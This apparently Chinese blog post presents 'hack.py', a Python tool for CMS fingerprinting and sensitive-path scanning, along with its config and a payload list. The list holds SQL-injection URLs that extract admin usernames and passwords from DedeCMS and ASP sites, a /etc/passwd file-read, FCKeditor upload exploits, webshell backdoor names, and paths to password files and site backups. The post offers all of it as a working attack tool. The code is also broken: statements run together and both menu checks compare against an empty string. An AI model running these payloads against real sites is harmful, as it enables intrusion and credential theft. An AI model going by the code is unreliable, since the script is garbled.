前言:

之前逛SAFEING极客社区的时候

发现一款黑市卖2000多的软件,后面下载了

打不开。发现config文件里面有些不错的东西。总结了一下

有了以下的脚本。

脚本用处:

【1】探测CMS(不敢说百分百吧,起码准确率不低于80%) 加大了判断

【2】挖掘敏感目录下存在的漏洞

代码:

hack.py

import requests
import re
import threading
import json
print('banner')
banner=""" _ _ _ ____
| | | | __ _ ___| | __/ ___| ___ __ _ _ __
| |_| |/ _` |/ __| |/ /\___ \ / __/ _` | '_ \
| _ | (_| | (__| < ___) | (_| (_| | | | |
|_| |_|\__,_|\___|_|\_\|____/ \___\__,_|_| |_| """
print('[1]CMS识别与CMS特殊路径收集')
print('[2]敏感目录扫描')
print(banner)
xz=input('请选择:')
def ini():
global e
import configparser
conf = configparser.ConfigParser()
cmserror = []
conf.read('hackscan.ini')
error = conf.get('cmscanerror', 'error')
error1 = conf.get('cmscanerror', 'error1')
error2 = conf.get('cmscanerror', 'error2')
error3 = conf.get('cmscanerror', 'error3')
error4 = conf.get('cmscanerror', 'error4')
error5 = conf.get('cmscanerror', 'error5')
error6 = conf.get('cmscanerror', 'error6')
error7 = conf.get('cmscanerror', 'error7')
error8 = conf.get('cmscanerror', 'error8')
error9 = conf.get('cmscanerror', 'error9')
error10 = conf.get('cmscanerror', 'error10')
error11 = conf.get('cmscanerror', 'error11')
error12 = conf.get('cmscanerror', 'error12')
cmserror.append(error1)
cmserror.append(error2)
cmserror.append(error3)
cmserror.append(error4)
cmserror.append(error5)
cmserror.append(error6)
cmserror.append(error7)
cmserror.append(error8)
cmserror.append(error9)
cmserror.append(error10)
cmserror.append(error11)
cmserror.append(error12)
for e in cmserror:
pass
ini()
def cmsscan():
user = input('输入要扫描的url:')
print('[&]识别CMS,并扫描出CMS存活的路径')
yuanheaders={'user-agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36'}
yuan=user.rstrip().rstrip('/')
yuans=requests.get(url=yuan,headers=yuanheaders,allow_redirects=False)
yuanlen=len(yuans.text) print('[@]扫描中....')
with open('data.json', 'r') as b:
a = json.load(b)
lisw = eval(str(a))
for x in lisw:
cms=x['url']
cmsname=x['name'] headers={'user-agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36'}
urls=user.rstrip().rstrip('/')+cms
cmssb=requests.get(url=urls,headers=headers,allow_redirects=False)
cmslen=len(cmssb.text)
if cmssb.status_code == 200 and yuanlen != cmslen:
print('[*]识别到的CMSurl:{}'.format(cmssb.url))
print('[*]CMS为:{}'.format(cmsname))
else:
pass def mgscan():
user = input('输入要扫描的url:')
with open('漏洞.txt', 'r') as a:
for x in a.readlines():
url = re.findall('(.*?)\|\|', x.strip())
names = re.findall('\|\|(.*)', x.strip())
urls = "".join(url)
payload=user.rstrip().rstrip('/')+urls
namess="".join(names)
headers = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36'}
mgs=requests.get(url=payload,headers=headers,allow_redirects=False)
if mgs.status_code == 200:
if e in str(mgs.text):
pass
else:
print('[*]扫描出的敏感目录:{}'.format(mgs.url))
print(namess) def main():
while True:
if xz == '':
c=threading.Thread(target=cmsscan,args=())
c.start()
break
elif xz == '':
mgscan()
m=threading.Thread(target=mgscan,args=())
m.start()
else:
print('[-]输入不能为空!')
continue
main()

hacksca.ini

[cmscanerror]
error=找不到这个文件
error1=找不到该网页
error2=NotFound
error3=这个网页迷失了
error4=不存在
error5=不存在该网页
error6=404
error7=您无权访问该网页
error8=防火墙
error9=没有这个网页
error10=网页不见了
error11=ERROR
error12=errors

漏洞.txt

/FCKeditor/editor/filemanager/connectors/uploadtest.html||File Upload|Fck上传,请手动检测
/FCKeditor/editor/filemanager/connectors/uploadtest.html||查阅fckeditor漏洞利用
/FCKeditor/editor/filemanager/upload/test.html||File Upload|Fck上传,请手动检测
/FCKeditor/editor/filemanager/upload/test.html||查阅fckeditor漏洞利用
/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php||Tinymce漏洞
/adminer.php||MYSQL管理界面
/wp-login.php||wordpress登陆界面
/blog/wp-login.php||wordpress登陆界面
/wordpress/wp-login.php||wordpress登陆界面
/phpmyadmin/index.php||MYSQL管理界面
/admin.txt||密码文件
/pass.txt||密码文件
/qq.txt||密码文件
/bigdump.php||Php数据库管理文件 Exp:http://host/bigdump.php?start=
/config.txt||密码文件
/extras/curltest.php||ZENcart系统漏洞文件
/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html||Opencart 1.4.9.1 - Remote File Upload Vulnerability
/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media||ZENcart系统漏洞文件
/editors/fckeditor/editor/filemanager/upload/php/upload.php||FCK编辑器上传
/includes/templates/template_default/buttons/english/button_add_address.gif||zencart系统
/editors/htmlarea/plugins/ImageManager/images.php||Tinymce漏洞
/editors/tiny_mce/plugins/ImageManager/manager.php||ZENcart系统漏洞文件
/editors/tiny_mce/plugins/filemanager/pages/fm/index.html||Tinymce漏洞
/.svn/entries||svn漏洞
/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='||SQL注入
/WEB-INF/classes/jmx-console-users.properties||JSP敏感文件
/admin/diy.asp||后们木马
/admin/system/editor/FCKeditor/editor/fckeditor.Html||fckeditor漏洞
/autogetarticle/_GetLockPic.php?p=/etc/passwd||查阅"DoNews任意文件下载
/diy.asp||后门木马
/editor/editor/filemanager/browser/default/connectors/test.html|File Upload|Fck上传,请手动检测
/editor/editor/filemanager/browser/default/connectors/test.html||查阅fckeditor漏洞利用
/editor/editor/filemanager/connectors/test.html|File Upload|Fck上传,请手动检测
/editor/editor/filemanager/connectors/test.html||查阅fckeditor漏洞利用
/editor/editor/filemanager/connectors/uploadtest.html|File Upload|Fck上传,请手动检测
/editor/editor/filemanager/connectors/uploadtest.html||查阅fckeditor漏洞利用
/editor/editor/filemanager/upload/test.html||查阅fckeditor漏洞利用
/fckeditor/editor/filemanager/browser/default/connectors/test.html|www.fckeditor.net|Fck上传,请手动检测
/fckeditor/editor/filemanager/browser/default/connectors/test.html||查阅fckeditor漏洞利用
/fckeditor/editor/filemanager/connectors/test.html|File Upload|Fck上传,请手动检测
/fckeditor/editor/filemanager/connectors/test.html||查阅fckeditor漏洞利用
/includes/modules/payment/alipay.php||查alipay.php利用
/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a||DEDE注入漏洞
/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a||DEDE注入漏洞
/web-console/||用admin-admin尝试登录-jboss漏洞
/webmanage/FCKeditor/editor/filemanager/connectors/uploadtest.html||查阅fckeditor漏洞利用
/webmanage/fckeditor/editor/filemanager/browser/default/connectors/test.html||查阅fckeditor漏洞利用
/webmanage/fckeditor/editor/filemanager/connectors/test.html||查阅fckeditor漏洞利用
/1.rar||敏感文件
/1.zip||敏感文件
/147.rar||敏感文件
/2.rar||敏感文件
/2.zip||敏感文件
/369.rar||敏感文件
/HYTop.mdb||木马备份的整站
/Upfile_AdPia.asp||上传后缀
/Upfile_AdPic.asp||上传后缀
/Upfile_Articla.asp||上传后缀
/Upfile_Article.asp||上传后缀
/Upfile_Dialog.asp||上传后缀
/Upfile_OrderPic.asp||上传后缀
/admimistrator||可能为管理员后台路径
/admin.rar||关键文件
/admin.zip||关键文件
/admin||可能为管理员后台路径
/c99.php|s|老外木马,有通杀后门http://www.blackploit.com/2014/06/backdoor-en-shell-c99php-bypass-password.html
/data.rar||数据库文件
/data.zip||数据库文件
/db.rar||数据库文件
/db.zip||数据库文件
/fdsa.rar||整站文件
/fdsa.zip||整站文件
/flashfxp.rar||关键文件
/flashfxp.zip||关键文件
/ftp.txt||密码文件
/gg.rar||关键文件
/manage||可能为管理员后台路径
/password.txt||密码文件
/root.rar||整站文件
/root.zip||整站文件
/sb.rar||敏感文件
/server.rar||敏感文件
/server/default/conf/props/jmx-console-users.propertie||查阅jboss漏洞
/sf.rar||敏感文件
/shop.mdb||敏感文件
/sql.rar||敏感文件
/test.rar||敏感文件
/unix.rar||敏感文件
/upfile.asp||上传后缀
/upfile_adpic.asp||上传后缀
/upfile_flash.asp||上传后缀
/upfile_photo.asp||上传后缀
/upfile_softpic.asp||上传后缀
/upload.asp||上传后缀
/user.dat||敏感文件
/user.rar||敏感文件
/vip.rar||关键文件
/wangzhan.rar||整站文件
/wangzhan.zip||整站文件
/web.rar||整站文件
/web.zip||整站文件
/wo.rar||敏感文件
/www.rar||整站文件
/www.zip||整站文件
/wwwroot.rar||整站文件
/wwwroot.zip||整站文件
/wz.rar||整站文件
/wz.zip||整站文件
/复件 wwww.rar||关键文件
/复件 新建文件夹.rar||关键文件
/新建文件夹.rar||关键文件
/新建文件夹.zip||关键文件
/软件.rar||关键文件

data.json

点我:https://paste.ubuntu.com/p/yhpKvCZvK6/

测试结果:

这个脚本会不定期更新

python写个Hack Scan的更多相关文章

  1. Python写各大聊天系统的屏蔽脏话功能原理

    Python写各大聊天系统的屏蔽脏话功能原理 突然想到一个视频里面弹幕被和谐的一满屏的*号觉得很有趣,然后就想用python来试试写写看,结果还真玩出了点效果,思路是首先你得有一个脏话存放的仓库好到时 ...

  2. python写红包的原理流程包含random,lambda其中的使用和见简单介绍

    Python写红包的原理流程 首先来说说要用到的知识点,第一个要说的是扩展包random,random模块一般用来生成一个随机数 今天要用到ramdom中unifrom的方法用于生成一个指定范围的随机 ...

  3. Python写地铁的到站的原理简易版

    Python地铁的到站流程及原理(个人理解) 今天坐地铁看着站牌就莫名的想如果用Python写其工作原理 是不是很简单就小试牛刀了下大佬们勿喷纯属小弟个人理解 首先来看看地铁上显示的站牌如下: 就想这 ...

  4. 用Python写一个简单的Web框架

    一.概述 二.从demo_app开始 三.WSGI中的application 四.区分URL 五.重构 1.正则匹配URL 2.DRY 3.抽象出框架 六.参考 一.概述 在Python中,WSGI( ...

  5. 读书笔记汇总 --- 用Python写网络爬虫

    本系列记录并分享:学习利用Python写网络爬虫的过程. 书目信息 Link 书名: 用Python写网络爬虫 作者: [澳]理查德 劳森(Richard Lawson) 原版名称: web scra ...

  6. Python写UTF8文件,UE、记事本打开依然乱码的问题

    Python写UTF8文件,UE.记事本打开依然乱码的问题 Leave a reply 现象:使用codecs打开文件,写入UTF-8文本,正常无错误.用vim打开正常,但记事本.UE等打开乱码. 原 ...

  7. python 写的http后台弱口令爆破工具

    今天来弄一个后台破解的Python小程序,哈哈,直接上代码吧,都有注释~~ 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 ...

  8. python写xml文件

    为了便于后续的读取处理,这里就将信息保存在xml文件中,想到得到的文件如下: 1 <?xml version="1.0" encoding="utf-8" ...

  9. Python之美[从菜鸟到高手]--一步一步动手给Python写扩展(异常处理和引用计数)

    我们将继续一步一步动手给Python写扩展,通过上一篇我们学习了如何写扩展,本篇将介绍一些高级话题,如异常,引用计数问题等.强烈建议先看上一篇,Python之美[从菜鸟到高手]--一步一步动手给Pyt ...

随机推荐

  1. 基于tensorflow的增强学习

    可以通过下面的连接查看这个项目工程: https://github.com/reinforceio/tensorforce 通过这遍文章来了这个项目的使用: https://reinforce.io/ ...

  2. 学习三部曲:WHAT、HOW、WHY

    一个人学习的过程要经历以下三步,才可以说得上"学会"两字: 第一步:WHAT 所谓的"WHAT",就是搞清楚某个东东是什么?有什么用?有什么语法?有什么功能特性 ...

  3. HDU 3345

    http://acm.hdu.edu.cn/showproblem.php?pid=3345 最近重写usaco压力好大,每天写的都想吐.. 水一道bfs 注意的是开始旁边有敌人可以随便走,但是一旦开 ...

  4. js之3D轮播图

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/ ...

  5. C# 速编神器LinqPad(新版5.25)

    点此下载5.25 (支持.net4.6,有调试器)(页面有广告,一直点免费下载即可)(可用)密码  lp123456  批处理如下. @echo off start /b LINQPad.exe -n ...

  6. Uoj 129 寿司晚宴

    Uoj 129 寿司晚宴 显然合法性只与每个数所含的质因子有关,考虑状压 \(dp\) 若记录所有质因子状态显然爆炸,注意到每个数最多有一个超过 \(\sqrt 500\) 的大质因子,而其他的小质因 ...

  7. java获取服务器的ip和地址

    HttpServletRequest httpRequest=(HttpServletRequest)request; String strBackUrl = "http://" ...

  8. (1/2) 为了理解 UWP 的启动流程,我从零开始创建了一个 UWP 程序

    每次使用 Visual Studio 的模板创建一个 UWP 程序,我们会在项目中发现大量的项目文件.配置.应用启动流程代码和界面代码.然而这些文件在 UWP 程序中到底是如何工作起来的? 我从零开始 ...

  9. B/S供应链(打印管理)问题答疑

    1.环境上的搭建答疑 .{"System.Data.OracleClient需要 Oracle 客户端软件 version 8.1.7或更高版本."} 解决:未装客户端,或所装版本 ...

  10. Google、IBM和Lyft开源其大型微服务系统管理工具Istio

    Istio 的优势 集群规模可视性:在故障状况出现时,运营人员需要利用多种工具以始终关注集群运行状况并分析微服务状态图表.Istio 项目能够监控与应用程序及网络活动相关的数据,利用 Promethe ...